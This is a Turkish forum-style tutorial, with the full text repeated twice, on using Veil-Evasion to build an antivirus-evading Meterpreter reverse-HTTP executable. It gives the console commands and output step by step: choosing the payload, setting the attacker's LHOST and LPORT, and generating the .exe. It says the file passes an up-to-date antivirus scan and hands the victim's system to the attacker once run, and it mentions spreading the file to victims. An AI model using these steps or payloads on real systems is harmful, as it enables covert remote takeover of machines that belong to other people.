Merhabalar bügün sizlere nasıl antivirüs atlatabiliriz göstereceğim eski arşivden buldum paylaşayım dedim?Hadi go
Zararlı yazılımların encoding yöntemi ile antivirüslerden atlatılması.
Araçlar:
Hedef sistemlerde saldırıların başarısızlıkla sonuçlanmasına sebep olan önlemlerden bir tanesi de antivirüs kullanımıdır. Antivirüsler imza tabanlı olarak çalışmaktadır bundan dolayı tanımadığı bir yazılımı veya davranışını tanımlayamadığı bir yazılımı tehdit olarak algılamamaktadır.
İlk olarak encoding edilmiş zararlı yazılımı oluşturmalıyız. Bu iş için veil-frame work kullanılacaktır;
Not: Veil-framework kurulumu eğitimlerimizde anlatılmaktadır.
Veil dizinine gidilerek program çalıştırılır;
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
Elde edilmesi beklenen ekran;
List komutu ile tüm olası payload çeşitleri listelenir;
[>] Please enter a command: list
Bu aşamada birçok zaralı yöntemi seçilebilmektedir.
Burada 3. sırada bulunan, C dilinde yazılmış ve saldırganın makinesine HTTP ile bağlantı isteği gönderecek olan bir payload seçilecektir.
[>] Please enter a command: 3
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: c/meterpreter/rev_http loaded
Bu aşamadan sonra saldırganın IP adresi ve port numarası girilip zararlı yazılımın bu standartlarda üretilmesi sağlanmalıdır.
Girilmesi gereken komutlar:
set LHOST 192.168.1.41
set LPORT 4445
generate
İlgili değişikliklerin gerçekleştirildiği alanlar ve sonuçları:
Required Options:
Name Current Value Description
---- ------------- -----------
LHOST IP of the metasploit handler
LPORT 8080 Port of the metasploit handler
compile_to_exe Y Compile to an executable
Available commands:
set set a specific option value
info show information about the payload
generate generate payload
back go to the main menu
exit exit Veil
[>] Please enter a command: set LHOST 192.168.1.41
[>] Please enter a command: set LPORT 4445
[>] Please enter a command: generate
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: testme
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Executable written to: /usr/share/veil-output/compiled/testme.exe
Language: c
Payload: c/meterpreter/rev_http
Required Options: LHOST=192.168.1.41 LPORT=4445 compile_to_exe=Y
Payload File: /usr/share/veil-output/source/testme.c
Handler File: /usr/share/veil-output/handlers/testme_handler.rc
[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner!
Zararlı yazılımın oluşturulan dizini: /usr/share/veil-output/compiled/testme.exe
Zararlı yazılımın kurban sistemlere bulaştırılması için çeşitli yöntemler kullanılabilir.
Hedef sisteme bulaştırılan yazılımın, veritabanı güncel olan bir antivirüs ile taranma sonucu;
Görüldüğü gibi zararlı yazılım olduğu tespit edilmemiştir.
Halbuki zararlı yazılım çalıştırıldığında saldırganın makinesine bağlantı oluşturulmakta ve sistem saldırganın eline geçmiş olmaktadır.Tuzak sistem olma ihtimaleride vardır.
Bob-White hiçbir şekilde oluşabilcek sorumlardan sorumludegildir.
Zararlı yazılımların encoding yöntemi ile antivirüslerden atlatılması.
Araçlar:
- Veil-evasion master
- Armitage
Hedef sistemlerde saldırıların başarısızlıkla sonuçlanmasına sebep olan önlemlerden bir tanesi de antivirüs kullanımıdır. Antivirüsler imza tabanlı olarak çalışmaktadır bundan dolayı tanımadığı bir yazılımı veya davranışını tanımlayamadığı bir yazılımı tehdit olarak algılamamaktadır.
İlk olarak encoding edilmiş zararlı yazılımı oluşturmalıyız. Bu iş için veil-frame work kullanılacaktır;
Not: Veil-framework kurulumu eğitimlerimizde anlatılmaktadır.
Veil dizinine gidilerek program çalıştırılır;
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
Elde edilmesi beklenen ekran;
List komutu ile tüm olası payload çeşitleri listelenir;
[>] Please enter a command: list
Bu aşamada birçok zaralı yöntemi seçilebilmektedir.
Burada 3. sırada bulunan, C dilinde yazılmış ve saldırganın makinesine HTTP ile bağlantı isteği gönderecek olan bir payload seçilecektir.
[>] Please enter a command: 3
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: c/meterpreter/rev_http loaded
Bu aşamadan sonra saldırganın IP adresi ve port numarası girilip zararlı yazılımın bu standartlarda üretilmesi sağlanmalıdır.
Girilmesi gereken komutlar:
set LHOST 192.168.1.41
set LPORT 4445
generate
İlgili değişikliklerin gerçekleştirildiği alanlar ve sonuçları:
Required Options:
Name Current Value Description
---- ------------- -----------
LHOST IP of the metasploit handler
LPORT 8080 Port of the metasploit handler
compile_to_exe Y Compile to an executable
Available commands:
set set a specific option value
info show information about the payload
generate generate payload
back go to the main menu
exit exit Veil
[>] Please enter a command: set LHOST 192.168.1.41
[>] Please enter a command: set LPORT 4445
[>] Please enter a command: generate
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: testme
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Executable written to: /usr/share/veil-output/compiled/testme.exe
Language: c
Payload: c/meterpreter/rev_http
Required Options: LHOST=192.168.1.41 LPORT=4445 compile_to_exe=Y
Payload File: /usr/share/veil-output/source/testme.c
Handler File: /usr/share/veil-output/handlers/testme_handler.rc
[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner!
Zararlı yazılımın oluşturulan dizini: /usr/share/veil-output/compiled/testme.exe
Zararlı yazılımın kurban sistemlere bulaştırılması için çeşitli yöntemler kullanılabilir.
Hedef sisteme bulaştırılan yazılımın, veritabanı güncel olan bir antivirüs ile taranma sonucu;
Görüldüğü gibi zararlı yazılım olduğu tespit edilmemiştir.
Halbuki zararlı yazılım çalıştırıldığında saldırganın makinesine bağlantı oluşturulmakta ve sistem saldırganın eline geçmiş olmaktadır.Tuzak sistem olma ihtimaleride vardır.
Bob-White hiçbir şekilde oluşabilcek sorumlardan sorumludegildir.